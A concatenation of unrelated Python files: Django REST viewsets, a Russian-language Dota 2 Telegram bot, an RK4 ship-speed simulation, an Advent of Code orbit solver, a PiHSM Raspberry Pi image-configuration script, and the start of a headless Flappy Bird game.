class AccessibilityDescriptionViewSet(viewsets.ModelViewSet):
queryset = AccessibilityDescription.objects.all().order_by('id')
serializer_class = AccessibilityDescriptionSerializer
class ActivityViewSet(viewsets.ModelViewSet):
queryset = Activity.objects.all().order_by('prefLabel')
serializer_class = ActivitySerializer
class IndicativeDurationViewSet(viewsets.ModelViewSet):
queryset = IndicativeDuration.objects.all().order_by('id')
serializer_class = IndicativeDurationSerializer
class AmenityFeatureViewSet(viewsets.ModelViewSet):
queryset = AmenityFeature.objects.all().order_by('name')
serializer_class = AmenityFeatureSerializer
class GeoCoordinatesViewSet(viewsets.ModelViewSet):
queryset = GeoCoordinates.objects.all().order_by('id')
serializer_class = GeoCoordinatesSerializer
class RoutePointViewSet(viewsets.ModelViewSet):
queryset = RoutePoint.objects.all().order_by('name')
serializer_class = RoutePointSerializer
class RouteGradientViewSet(viewsets.ModelViewSet):
queryset = RouteGradient.objects.all().order_by('id')
serializer_class = RouteGradientSerializer
class RouteDifficultyViewSet(viewsets.ModelViewSet):
queryset = RouteDifficulty.objects.all().order_by('id')
serializer_class = RouteDifficultySerializer
class ImageViewSet(viewsets.ModelViewSet):
queryset = Image.objects.all().order_by('id')
serializer_class = ImageSerializer
class RouteLegalAdvisoryViewSet(viewsets.ModelViewSet):
queryset = RouteLegalAdvisory.objects.all().order_by('id')
serializer_class = RouteLegalAdvisorySerializer
class RouteDesignationViewSet(viewsets.ModelViewSet):
queryset = RouteDesignation.objects.all().order_by('id')
serializer_class = RouteDesignationSerializer
class RouteSegmentGroupViewSet(viewsets.ModelViewSet):
queryset = RouteSegmentGroup.objects.all().order_by('id')
serializer_class = RouteSegmentGroupSerializer
class UserGeneratedContentGroupViewSet(viewsets.ModelViewSet):
queryset = UserGeneratedContent.objects.all().order_by('id')
serializer_class = UserGeneratedContentSerializer
class RouteRiskAdvisoryViewSet(viewsets.ModelViewSet):
queryset = RouteRiskAdvisory.objects.all().order_by('id')
serializer_class = RouteRiskAdvisorySerializer
class KnownRiskViewSet(viewsets.ModelViewSet):
queryset = KnownRisk.objects.all().order_by('id')
serializer_class = KnownRiskSerializer
class RiskModifierViewSet(viewsets.ModelViewSet):
queryset = RiskModifier.objects.all().order_by('id')
serializer_class = RiskModifierSerializer
class RouteAccessRestrictionViewSet(viewsets.ModelViewSet):
queryset = RouteAccessRestriction.objects.all().order_by('id')
serializer_class = RouteAccessRestrictionSerializer
class RouteAccessRestrictionTermViewSet(viewsets.ModelViewSet):
queryset = RouteAccessRestrictionTerm.objects.all().order_by('id')
serializer_class = RouteAccessRestrictionTermSerializer
class RiskMitigatorViewSet(viewsets.ModelViewSet):
queryset = RiskMitigator.objects.all().order_by('id')
serializer_class = RiskMitigatorSerializer
class UserGeneratedContentViewSet(viewsets.ModelViewSet):
queryset = UserGeneratedContent.objects.all().order_by('id')
serializer_class = UserGeneratedContentSerializer
|
from loader import dp
from keyboards.inline.herou1 import hero
from keyboards.inline.pow import power
from keyboards.inline.agi import agility
from keyboards.inline.netral import neutral
from keyboards.inline.intel import intelligence
from keyboards.inline.prost import easy
from keyboards.inline.items import item
from keyboards.inline.sbor import sbor
from keyboards.inline.nz8 import nazad
from keyboards.inline.nz9 import nazad1
from keyboards.inline.nz10 import nazad2
from keyboards.inline.nz11 import nazad3
from keyboards.inline.rz1 import rz1
from keyboards.inline.nz13 import nazad4
from keyboards.inline.rz2 import rz2
from keyboards.inline.nz15 import nazad5
from utils.db_api.db import Database
from keyboards.inline.nz20 import nazad20
from keyboards.inline.nzspr import nazadspr
from keyboards.inline.gid import guide
@dp.callback_query_handler()
async def test_test(call):
if call.data == "call":
await call.message.answer(text= 'выбирите атрибут героя',reply_markup=hero)
elif call.data == "сила":
await call.message.answer(text='выбирите героя',reply_markup=power)
elif call.data == "Axe":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Axe')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "SandKing":
await call.message.edit_reply_markup()
us = Database().hero_inf2('SandKing')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Mars":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Mars')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Anti-mage":
await call.message.edit_reply_markup()
us =Database().hero_inf('Anti-mage')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Drow Ranger":
await call.message.edit_reply_markup()
us = Database().hero_inf('Drow Ranger')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Juggernaut":
await call.message.edit_reply_markup()
us = Database().hero_inf('Juggernaut')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "ловкость":
await call.message.answer(text='выбирите героя',reply_markup=agility)
elif call.data == "нейтральные":
await call.message.answer(text='выбирите разряд',reply_markup=neutral)
elif call.data == "интелект":
await call.message.answer(text='выбирите героя',reply_markup=intelligence)
elif call.data == "Cristal Maiden":
await call.message.edit_reply_markup()
us = Database().hero_inf3('Cristal Maiden')
await call.message.answer(us, reply_markup=nazad2)
elif call.data == "Puck":
await call.message.edit_reply_markup()
us = Database().hero_inf3('Puck')
await call.message.answer(us, reply_markup=nazad2)
elif call.data == "Storm Spirit":
await call.message.edit_reply_markup()
us = Database().hero_inf3('Storm Spirit')
await call.message.answer(us, reply_markup=nazad2)
elif call.data == "простые":
await call.message.answer(text='выбирите предмет',reply_markup=easy)
elif call.data == "Town Portal Scroll":
await call.message.edit_reply_markup()
us = Database().item_inf('Town Portal Scroll')
await call.message.answer(us, reply_markup=nazad3)
elif call.data == "Ironwood Branch":
await call.message.edit_reply_markup()
us = Database().item_inf('Ironwood Branch')
await call.message.answer(us, reply_markup=nazad3)
elif call.data == "Quelling Blade":
await call.message.edit_reply_markup()
us = Database().item_inf('Quelling Blade')
await call.message.answer(us, reply_markup=nazad3)
elif call.data == "Назад1":
await call.message.answer(text='выбирите предмет',reply_markup=hero)
elif call.data == "Назад2":
await call.message.answer(text='выбирите предмет',reply_markup=hero)
elif call.data == "Назад3":
await call.message.answer(text='выбирите героя',reply_markup=hero)
elif call.data == "Назад4":
await call.message.answer(text='выбирите предмет',reply_markup=item)
elif call.data == "Назад5":
await call.message.answer(text='выбирите предмет',reply_markup=item)
elif call.data == "сборные":
await call.message.answer(text='выбирите предмет',reply_markup=sbor)
elif call.data == "Назад6":
await call.message.answer(text='выбирите предмет',reply_markup=item)
elif call.data == "Magic Wand":
await call.message.edit_reply_markup()
us = Database().item_inf3('Magic Wand')
await call.message.answer(us, reply_markup=nazad20)
elif call.data == "Buckler":
await call.message.edit_reply_markup()
us = Database().item_inf3('Buckler')
await call.message.answer(us, reply_markup=nazad20)
elif call.data == "Veil of Discord":
await call.message.edit_reply_markup()
us = Database().item_inf3('Veil of Discord')
await call.message.answer(us, reply_markup=nazad20)
elif call.data == "Назад8":
await call.message.answer(text='выбирите предмет',reply_markup=power)
elif call.data == "Назад9":
await call.message.answer(text='выбирите предмет',reply_markup=agility)
elif call.data == "Назад10":
await call.message.answer(text='выбирите героя',reply_markup=intelligence)
elif call.data == "Назад11":
await call.message.answer(text='выбирите предмет',reply_markup=easy)
elif call.data == "Разряд 1":
await call.message.answer(text='выбирите предмет',reply_markup=rz1)
elif call.data == "Назад12":
await call.message.answer(text='выбирите предмет',reply_markup=neutral)
elif call.data == "Keen Optic":
await call.message.edit_reply_markup()
us = Database().item_inf2('Keen Optic')
await call.message.answer(us, reply_markup=nazad4)
elif call.data == "Ironwood Tree":
await call.message.edit_reply_markup()
us = Database().item_inf2('Ironwood Tree')
await call.message.answer(us, reply_markup=nazad4)
elif call.data == "Ocean Hert":
await call.message.edit_reply_markup()
us = Database().item_inf2('Ocean Hert')
await call.message.answer(us, reply_markup=nazad4)
elif call.data == "Назад13":
await call.message.answer(text='выбирите предмет',reply_markup=rz1)
elif call.data == "Разряд 2":
await call.message.answer(text='выбирите предмет',reply_markup=rz2)
elif call.data == "Назад14":
await call.message.answer(text='выбирите предмет',reply_markup=neutral)
elif call.data == "Ring of Aquila":
await call.message.edit_reply_markup()
us = Database().item_inf2('Ring of Aquila')
await call.message.answer(us, reply_markup=nazad5)
elif call.data == "Imp Claw":
await call.message.edit_reply_markup()
us = Database().item_inf2('Imp Claw')
await call.message.answer(us, reply_markup=nazad5)
elif call.data == "Nether Shawl":
await call.message.edit_reply_markup()
us = Database().item_inf2('Nether Shawl')
await call.message.answer(us, reply_markup=nazad5)
elif call.data == "Назад15":
await call.message.answer(text='выбирите предмет',reply_markup=rz2)
elif call.data == "Назад20":
await call.message.answer(text='выбирите предмет',reply_markup=sbor)
elif call.data == "Earthshaker":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Earthshaker')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Sven":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Sven')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Tiny":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Tiny')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Kunkka":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Kunkka')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Dragon Knight":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Dragon Knight')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Omniknight":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Omniknight')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Clockwerk":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Clockwerk')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Alchemist":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Alchemist')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Huskar":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Huskar')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Brewmaster":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Brewmaster')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Treant Protector":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Treant Protector')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Centaur Warrunner":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Centaur Warrunner')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Bristleback":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Bristleback')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Timbersaw":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Timbersaw')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Tusk":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Tusk')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Elder Titan":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Elder Titan')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Legion commander":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Legion commander')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Earth Spirit":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Earth Spirit')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Pudge":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Pudge')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Tidehunter":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Tidehunter')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Night Stalker":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Night Stalker')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Phoenix":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Phoenix')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Wraith King":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Wraith King')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Slardar":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Slardar')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Lifestealer":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Lifestealer')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Chaos Knight":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Chaos Knight')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Undying":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Undying')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Spirit Breaker":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Spirit Breaker')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Abaddon":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Abaddon')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Doom":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Doom')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Magnus":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Magnus')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Lycan":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Lycan')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "Underlord":
await call.message.edit_reply_markup()
us = Database().hero_inf2('Underlord')
await call.message.answer(us, reply_markup=nazad)
elif call.data == "роли героев":
await call.message.edit_reply_markup()
us = Database().item_spr('роли героев')
await call.message.answer(us, reply_markup=nazadspr)
elif call.data == "Назадспр":
await call.message.answer(text='выбирите предмет',reply_markup=guide)
elif call.data == "Vengeful Spirit":
await call.message.edit_reply_markup()
us =Database().hero_inf('Vengeful Spirit')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Phantom Lancer":
await call.message.edit_reply_markup()
us =Database().hero_inf('Phantom Lancer')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Morphling":
await call.message.edit_reply_markup()
us =Database().hero_inf('Morphling')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Riki":
await call.message.edit_reply_markup()
us =Database().hero_inf('Riki')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Lone Druid":
await call.message.edit_reply_markup()
us =Database().hero_inf('Lone Druid')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Naga Siren":
await call.message.edit_reply_markup()
us =Database().hero_inf('Naga Siren')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Ursa":
await call.message.edit_reply_markup()
us =Database().hero_inf('Ursa')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Templar Assassin":
await call.message.edit_reply_markup()
us =Database().hero_inf('Templar Assassin')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Ember Spirit":
await call.message.edit_reply_markup()
us =Database().hero_inf('Ember Spirit')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Bounti Hunter":
await call.message.edit_reply_markup()
us =Database().hero_inf('Bounti Hunter')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Sniper":
await call.message.edit_reply_markup()
us =Database().hero_inf('Sniper')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Gyrocopter":
await call.message.edit_reply_markup()
us =Database().hero_inf('Gyrocopter')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Luna":
await call.message.edit_reply_markup()
us =Database().hero_inf('Luna')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Troll Warlord":
await call.message.edit_reply_markup()
us =Database().hero_inf('Troll Warlord')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Faceless Void":
await call.message.edit_reply_markup()
us =Database().hero_inf('Faceless Void')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Phantom Assassin":
await call.message.edit_reply_markup()
us =Database().hero_inf('Phantom Assassin')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Razor":
await call.message.edit_reply_markup()
us =Database().hero_inf('Razor')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Clinkz":
await call.message.edit_reply_markup()
us =Database().hero_inf('Clinkz')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Shadow Fiend":
await call.message.edit_reply_markup()
us =Database().hero_inf('Shadow Fiend')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Venomancer":
await call.message.edit_reply_markup()
us =Database().hero_inf('Venomancer')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Bloodseeker":
await call.message.edit_reply_markup()
us =Database().hero_inf('Bloodseeker')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Viper":
await call.message.edit_reply_markup()
us =Database().hero_inf('Viper')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Nyx Assassin":
await call.message.edit_reply_markup()
us =Database().hero_inf('Nyx Assassin')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Slark":
await call.message.edit_reply_markup()
us =Database().hero_inf('Slark')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Weaver":
await call.message.edit_reply_markup()
us =Database().hero_inf('Weaver')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Spectre":
await call.message.edit_reply_markup()
us =Database().hero_inf('Spectre')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Meepo":
await call.message.edit_reply_markup()
us =Database().hero_inf('Meepo')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Broodmother":
await call.message.edit_reply_markup()
us =Database().hero_inf('Broodmother')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Medusa":
await call.message.edit_reply_markup()
us =Database().hero_inf('Medusa')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Terrorblade":
await call.message.edit_reply_markup()
us =Database().hero_inf('Terrorblade')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Arc Warden":
await call.message.edit_reply_markup()
us =Database().hero_inf('Arc Warden')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Monkey King":
await call.message.edit_reply_markup()
us =Database().hero_inf('Monkey King')
await call.message.answer(us, reply_markup=nazad1)
elif call.data == "Pangolier":
await call.message.edit_reply_markup()
us =Database().hero_inf('Pangolier')
await call.message.answer(us, reply_markup=nazad1)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['font.family'] = 'STSong'
fig = plt.figure(figsize=(12, 8), dpi=100)
N = 100000
h = 0.1
m = 1.82781*10**8
X_P = 3.3*10**6
d = 16.5
C_b = 0.8580
B = 45.0
L = 280.0
S = 19556.1
p = 1.02473*10**3
v = 1.05372*10**(-6)
m_x = 4.799*10**7
X, Y = [0], [0]
def f(x,y):
R = y * L / v
t = np.log10(R)
C_f = 0.075 / ((t - 2)**2)
C_t = C_f + 0.9*10**(-3) +4*10**(-4)
X_H = -1/2*p*y*y*S*C_t
return (X_H+X_P)/(m+m_x)
#
# def f(x, y):
# return -x * y ** 2
y_n = 2
for i in range(N):
x_n = i * h
k_1 = f(x_n, y_n)
k_2 = f(x_n + 0.5 * h, y_n + 0.5 * h * h * k_1)
k_3 = f(x_n + 0.5 * h, y_n + 0.5 * h * k_2)
k_4 = f(x_n + h, y_n + h * k_3)
y_n += 1 / 6 * h * (k_1 + 2 * k_2 + 2 * k_3 + k_4)
X.append(x_n + h)
Y.append(y_n)
plt.plot(X, Y, 'r:')
print(Y)
f = open('log.txt','w')
for i in Y:
if(i == float('inf')):
break
else:
f.write(str(i))
f.write(str(','))
f.flush()
print(i)
plt.show()
|
import networkx as nx
from collections import defaultdict
file = "Day6/inputnaomi.txt"
with open(file,'r') as f:
data = f.readlines()
f.close()
G = nx.Graph()
# Construct directed graph A->B if A directly orbited by B
for row in data:
src,dst=row.strip().split(')')
G.add_edge(src,dst)
def BFS(startnode, distance, visited_nodes,distances):
neighbours = G.neighbors(startnode)
distance+=1
for n in neighbours:
if visited_nodes[n]==True:
continue
visited_nodes[n]=True
distances[n]=distance
BFS(n,distance,visited_nodes,distances)
distances_from_origin={}
BFS("COM",0,defaultdict(lambda: False),distances_from_origin)
no_orbits=sum(distances_from_origin.values())
print("Part 1: "+str(no_orbits))
distances_from_you={}
BFS("YOU",0,defaultdict(lambda: False),distances_from_you)
print("Part 2: "+str(distances_from_you["SAN"]-2))
|
# pihsm: Turn your Raspberry Pi into a Hardware Security Module
# Copyright (C) 2017 System76, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
from os import path
import time
import tempfile
import shutil
import subprocess
from .common import atomic_write
log = logging.getLogger(__name__)
CHUNK_SIZE = 8 * 1024 * 1024
RC_LOCAL_1 = b"""#!/bin/sh -ex
# Written by PiHSM:
/etc/rc.local.2
mv /etc/rc.local.2 /etc/rc.local
sleep 2
ufw enable
sleep 10
apt-get purge -y openssh-server
add-apt-repository -ys ppa:jderose/pihsm
apt-get update
apt-get install -y pihsm-server
echo "HRNGDEVICE=/dev/hwrng" > /etc/default/rng-tools
# pollinate snapd mdadm
apt-get purge -y cloud-init cloud-guest-utils
deluser ubuntu --remove-home
systemctl disable apt-daily-upgrade.timer
systemctl disable apt-daily.timer
systemctl disable getty@.service
systemctl mask getty@.service
systemctl disable snapd.socket
systemctl disable snapd.service
systemctl disable snapd.refresh.timer
systemctl disable snapd.snap-repair.timer
systemctl disable lxd.socket
systemctl disable lxd-containers.service
systemctl disable lxcfs.service
systemctl disable ureadahead.service
systemctl disable lvm2-lvmetad.service
systemctl disable lvm2-lvmetad.socket
systemctl disable open-iscsi.service
systemctl disable iscsid.service
systemctl mask getty-static.service
systemctl mask systemd-rfkill.service
systemctl mask systemd-rfkill.socket
systemctl disable systemd-networkd.service
systemctl mask systemd-networkd.service
systemctl disable systemd-resolved.service
systemctl mask systemd-resolved.service
systemctl mask acpid.path
systemctl mask acpid.service
systemctl mask acpid.socket
sleep 3
pihsm-display-enable
sync
sleep 3
shutdown -h now
"""
RC_LOCAL_2 = b"""#!/bin/sh -ex
# Written by PiHSM:
sleep 1
echo ds1307 0x68 > /sys/class/i2c-adapter/i2c-1/new_device
sleep 5
hwclock -s --debug
"""
CONFIG_APPEND = b"""
# Added by PiHSM:
dtoverlay=i2c-rtc,ds1307
arm_freq=600
"""
JOURNALD_CONF_APPEND = b"""
# Added by PiHSM:
Storage=persistent
ForwardToSyslog=no
ForwardToWall=no
ForwardToConsole=yes
"""
RESOLVED_CONF_APPEND = b"""
# Added by PiHSM:
LLMNR=no
MulticastDNS=no
"""
def update_cmdline(basedir):
filename = path.join(basedir, 'boot', 'firmware', 'cmdline.txt')
old = open(filename, 'rb', 0).read()
parts = []
for p in old.split():
if p.startswith(b'console='):
log.info('Removing from cmdline: %r', p)
else:
parts.append(p)
new = b' '.join(parts) + b'\n'
if new == old:
log.info('Already modified: %r', filename)
else:
atomic_write(0o644, new, filename)
def _atomic_append(filename, append):
current = open(filename, 'rb', 0).read()
if current.endswith(append):
log.info('Already modified: %r', filename)
else:
atomic_write(0o644, current + append, filename)
def update_config(basedir):
filename = path.join(basedir, 'boot', 'firmware', 'config.txt')
_atomic_append(filename, CONFIG_APPEND)
def update_journald_conf(basedir):
filename = path.join(basedir, 'etc', 'systemd', 'journald.conf')
_atomic_append(filename, JOURNALD_CONF_APPEND)
def update_resolved_conf(basedir):
filename = path.join(basedir, 'etc', 'systemd', 'resolved.conf')
_atomic_append(filename, RESOLVED_CONF_APPEND)
def _mask_service(basedir, service):
target = '/dev/null'
link = path.join(basedir, 'etc', 'systemd', 'system', service)
assert not path.exists(link)
os.symlink(target, link)
log.info('Symlinked %r --> %r', link, target)
def _disable_service(basedir, wanted_by, service):
filename = path.join(basedir, 'etc', 'systemd', 'system', wanted_by, service)
assert path.islink(filename)
os.remove(filename)
log.info('Removed symlink %r', filename)
def disable_services(basedir):
pairs = [
('default.target.wants', 'ureadahead.service'),
('multi-user.target.wants', 'unattended-upgrades.service'),
]
for (wanted_by, service) in pairs:
_disable_service(basedir, wanted_by, service)
_mask_service(basedir, service)
def configure_image(basedir):
update_cmdline(basedir)
update_config(basedir)
update_journald_conf(basedir)
update_resolved_conf(basedir)
atomic_write(0o600, os.urandom(512),
path.join(basedir, 'var', 'lib', 'systemd', 'random-seed')
)
atomic_write(0o755, RC_LOCAL_1,
path.join(basedir, 'etc', 'rc.local')
)
atomic_write(0o755, RC_LOCAL_2,
path.join(basedir, 'etc', 'rc.local.2')
)
disable_services(basedir)
def open_image(filename):
return subprocess.Popen(
['xzcat', filename],
bufsize=0,
stdout=subprocess.PIPE,
)
def iter_image(filename, size=CHUNK_SIZE):
p = open_image(filename)
log.info('Image: %r', filename)
try:
while True:
chunk = p.stdout.read(size)
if chunk:
yield chunk
else:
break
except:
p.terminate()
finally:
p.wait()
assert p.returncode == 0
def sync_opener(path, flags):
return os.open(path, flags | os.O_SYNC | os.O_NOFOLLOW)
def umount(target):
try:
subprocess.check_call(['umount', target])
log.info('Unmounted %r', target)
except subprocess.CalledProcessError:
log.debug('Not mounted: %r', target)
def open_mmc(dev):
subprocess.check_call(['blockdev', '--rereadpt', dev])
return open(dev, 'wb', 0, opener=sync_opener)
def rereadpt(dev):
os.sync()
time.sleep(1)
subprocess.check_call(['blockdev', '--rereadpt', dev])
def write_image_to_mmc(img, dev):
total = 0
mmc = open_mmc(dev)
for chunk in iter_image(img):
total += mmc.write(chunk)
return total
def mmc_part(dev, n):
assert type(n) is int and n > 0
return '{}p{:d}'.format(dev, n)
class PiImager:
def __init__(self, img, dev):
self.img = img
self.dev = dev
self.p1 = mmc_part(dev, 1)
self.p2 = mmc_part(dev, 2)
def umount_all(self):
umount(self.p1)
umount(self.p2)
def write_image(self):
self.umount_all()
rereadpt(self.dev)
try:
total = write_image_to_mmc(self.img, self.dev)
os.sync()
time.sleep(1)
return total
finally:
rereadpt(self.dev)
def configure(self):
tmp = tempfile.mkdtemp(prefix='pihsm.')
try:
log.info('Working directory: %r', tmp)
root = path.join(tmp, 'root')
os.mkdir(root)
firmware = path.join(root, 'boot', 'firmware')
subprocess.check_call(['mount', self.p2, root])
subprocess.check_call(['mount', self.p1, firmware])
configure_image(root)
os.sync()
finally:
self.umount_all()
shutil.rmtree(tmp)
log.info('Removed directory %r', tmp)
def run(self):
self.write_image()
self.configure()
|
"""
使用模块实现单例模式
"""
class Singleton(object):
def foo(self):
pass
singleton = Singleton()
|
import pygame
from pygame.locals import *
from itertools import cycle
import random
import numpy as np
import cv2
import sys
import os
os.environ['SDL_VIDEODRIVER'] = 'dummy' # Run Headless Pygame environment
"""## Load Game Resources"""
def getHitmask(image):
"""returns a hitmask using an image's alpha."""
mask = []
for x in range(image.get_width()):
mask.append([])
for y in range(image.get_height()):
mask[x].append(bool(image.get_at((x,y))[3]))
return mask
def load(BASE_PATH = './'):
# path of player with different states
PLAYER_PATH = (
BASE_PATH + 'assets/sprites/redbird-upflap.png',
BASE_PATH + 'assets/sprites/redbird-midflap.png',
BASE_PATH + 'assets/sprites/redbird-downflap.png'
)
# path of background
BACKGROUND_PATH = BASE_PATH + 'assets/sprites/background-black.png'
# path of pipe
PIPE_PATH = BASE_PATH + 'assets/sprites/pipe-green.png'
IMAGES, HITMASKS = {}, {}
# numbers sprites for score display
IMAGES['numbers'] = (
pygame.image.load(BASE_PATH + 'assets/sprites/0.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/1.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/2.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/3.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/4.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/5.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/6.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/7.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/8.png').convert_alpha(),
pygame.image.load(BASE_PATH + 'assets/sprites/9.png').convert_alpha()
)
# base (ground) sprite
IMAGES['base'] = pygame.image.load(BASE_PATH + 'assets/sprites/base.png').convert_alpha()
# select random background sprites
IMAGES['background'] = pygame.image.load(BACKGROUND_PATH).convert()
# select random player sprites
IMAGES['player'] = (
pygame.image.load(PLAYER_PATH[0]).convert_alpha(),
pygame.image.load(PLAYER_PATH[1]).convert_alpha(),
pygame.image.load(PLAYER_PATH[2]).convert_alpha(),
)
# select random pipe sprites
IMAGES['pipe'] = (
pygame.transform.rotate(
pygame.image.load(PIPE_PATH).convert_alpha(), 180),
pygame.image.load(PIPE_PATH).convert_alpha(),
)
# hismask for pipes
HITMASKS['pipe'] = (
getHitmask(IMAGES['pipe'][0]),
getHitmask(IMAGES['pipe'][1]),
)
# hitmask for player
HITMASKS['player'] = (
getHitmask(IMAGES['player'][0]),
getHitmask(IMAGES['player'][1]),
getHitmask(IMAGES['player'][2]),
)
return IMAGES, HITMASKS
"""## Game Parameters Setting"""
FPS = 30
SCREENWIDTH = 288
SCREENHEIGHT = 512
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Flappy Bird')
IMAGES, HITMASKS = load()
PIPEGAPSIZE = 100 # gap between upper and lower part of pipe
BASEY = SCREENHEIGHT * 0.79
PLAYER_WIDTH = IMAGES['player'][0].get_width()
PLAYER_HEIGHT = IMAGES['player'][0].get_height()
PIPE_WIDTH = IMAGES['pipe'][0].get_width()
PIPE_HEIGHT = IMAGES['pipe'][0].get_height()
BACKGROUND_WIDTH = IMAGES['background'].get_width()
PLAYER_INDEX_GEN = cycle([0, 1, 2, 1])
class GameState:
def __init__(self):
